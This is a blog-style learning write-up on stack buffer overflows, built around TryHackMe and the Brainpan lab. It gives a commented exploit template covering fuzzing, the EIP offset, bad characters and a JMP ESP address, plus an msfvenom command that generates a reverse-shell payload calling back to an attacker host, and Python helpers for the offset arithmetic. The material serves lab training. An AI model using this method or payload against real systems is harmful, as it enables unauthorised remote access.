Introduction
Frankly, for a large part of my life I have been scared of buffer overflows.
I know how that sounds, but honestly, I have no shame in that.
So finally I gathered enough courage and thought I should give it a go.
. . .
What Helped
The following list of things worked like a charm:
1. Courage :P
2. The Cyber Mentor and his video series.
3. The Buffer Overflow Room on TryHackMe by Tiberius.
. . .
How?
Well, first watch all the videos. There are only 8 in the series and they are pretty short as well.
Then move on to TryHackMe and start solving the buffer overflow questions.
It takes a certain leap of faith, but when I got my first shell, it was definitely worth it.
After solving a few machines you will start getting familiar with the whole method. By the time I shelled the 6th one, I started feeling confident and just went on with BrainPan. Trust me, it is a lot simpler than it looks. All you have to do is get your hands dirty.
. . .
What have I done?
Well, once I started getting a little confident about my method, I asked a friend (who I know understands buffer overflows well) to check it. I am going to share the methodology that I think is going to work for me, hoping that it might help someone.
I would like to give all the credit for the following work to Tiberius and The Cyber Mentor.
. . .
Methodology
#In this file resides the BO Template
##########################################################################################
#Get the IP and port for the target machine.
targetIP='192.168.0.168'
port=9999
##########################################################################################
#Step 0 -- Spike the service to see which command is vulnerable. In these cases, we know all the functions are vulnerable.
##########################################################################################
command=""
##########################################################################################
#Step 1 -- Fuzz the app and find the approximate number of bytes it takes to crash the program.
##########################################################################################
# ./1-fuzz.py
# Server Crashed at : 600 Bytes.
##########################################################################################
# Step 2 -- With the approximate bytes, generate a pattern using the following command.
##########################################################################################
# -----------------------Generate Pattern -------------------------------------------------#
# While generating pattern, take 400 more bytes, just in case.
# /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_create.rb -l 1000
buffer_pattern="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2B"
# Then send this pattern to the app, and then copy the bytes from EIP.
# ./2-offset.py
# Pattern found from the EIP : 35724134
###########################################################################################
#Step 3 ---> Get the exact offset from the Pattern and verify if we can control the EIP.
###########################################################################################
# Get the exact offset using the following command
# /opt/metasploit-framework/embedded/framework/tools/exploit/pattern_offset.rb -l 2600 -q 35724134
offset=524
# Run ./3-controlEip.py to check if the EIP is now 42424242.
# If it is, move ahead; otherwise check whether the offset is correct or whether \x42 is a bad char.
# Basically, debug.
###########################################################################################
# This is the most important part.
# Step 4 - Find bad chars.
###########################################################################################
#This is the default set of every byte value from \x01 to \xff; \x00 is left out because it terminates strings.
badchars=(
"\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10"
"\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20"
"\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30"
"\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40"
"\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50"
"\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60"
"\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70"
"\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80"
"\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90"
"\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0"
"\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0"
"\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0"
"\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0"
"\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0"
"\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0"
"\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff"
)
# Run ./4-findBadChar.py
# Go to Immunity Debugger and follow ESP in the dump.
# Copy the contents from 01 to FF to hexDump inside the BadChars directory and run ./run.sh
# BadChars = \x00
###########################################################################################
# Step 5 - Choosing the correct module and checking if the call is made.
###########################################################################################
# Use !mona modules to find a module (a DLL or the executable itself) that has all protections off.
# Then use that module to search for a JMP ESP (\xff\xe4) address:
# !mona find -s "\xff\xe4" -m brainpan.exe  -- choose a return address that DOES NOT contain any bad char.
jmpCode="311712F3"
# convert that to little endian
jmpCode="\xf3\x12\x17\x31"
# After this step, check that the EIP has been overwritten with the chosen address.
# To check, open the app in Immunity, set a breakpoint on the address before its conversion to little endian, run
# ./5-checkGenShell.py
# and verify that the EIP matches. Once we have that, it's time to generate the shellcode.
##############################################################################################
# Step 6 - Gaining the shell
##############################################################################################
padding="\x90"*32
# Generate this overflow variable using the following command:
# msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.197 LPORT=1337 EXITFUNC=thread -f c -a x86 -b "\x00"
# 351 Bytes
overflow = (
# msfvenom output omitted; paste the generated shellcode bytes here
)
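As an added example (not the author's scripts and not Metasploit's code), the following Python 3 helpers reimplement the arithmetic behind steps 2 to 5 of the template: the cyclic pattern of pattern_create.rb, the offset lookup from the EIP value shown in the debugger, the little-endian conversion of the JMP ESP address, and the bad-char comparison that run.sh performs against the dump at ESP. The values are checked against the ones in the template above; the truncated dump in the demo is a constructed sample.

```python
import string
import struct

def pattern_create(length):
    """Same cyclic pattern as pattern_create.rb: triples of an upper-case
    letter, a lower-case letter and a digit, so any 4 consecutive bytes
    occur exactly once and can be mapped back to an offset."""
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]

def pattern_offset(pattern, eip_hex):
    """Immunity shows EIP as a big-endian hex value (e.g. 35724134), but the
    bytes were written to the stack in memory order, so reverse them to get
    the 4-character substring ('4Ar5') and look it up in the pattern."""
    needle = bytes.fromhex(eip_hex)[::-1].decode("ascii")
    return pattern.find(needle)  # -1 means EIP did not come from this pattern

def to_little_endian(addr_hex):
    """Pack an address as it must appear at the EIP offset:
    '311712F3' -> b'\\xf3\\x12\\x17\\x31'."""
    return struct.pack("<I", int(addr_hex, 16))

def first_bad_char(sent, observed):
    """Compare the bad-char probe that was sent with the bytes read from the
    dump at ESP. Returns the first byte that is missing or altered (an int),
    or None if the whole sequence survived. Remove that byte from the probe
    and repeat, since a mangled byte can corrupt everything after it."""
    for i, b in enumerate(sent):
        if i >= len(observed) or observed[i] != b:
            return b
    return None

# \x00 is excluded up front: it terminates C strings, as the template notes.
ALL_CHARS = bytes(range(0x01, 0x100))

if __name__ == "__main__":
    pat = pattern_create(1000)
    print("offset:", pattern_offset(pat, "35724134"))        # 524
    print("jmp esp:", to_little_endian("311712F3"))          # b'\xf3\x12\x17\x31'
    # Constructed sample: the dump stopped right before \x0a.
    print("bad char:", hex(first_bad_char(ALL_CHARS, ALL_CHARS[:9])))  # 0xa
```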
The different scripts used in the comments are now hosted on git.
Here’s the link.
For any feedback or corrections, please let me know.
Thank you for going through what I had to share. If you feel that someone could benefit from this, do share.
Stay Home, Stay Safe :D
. . .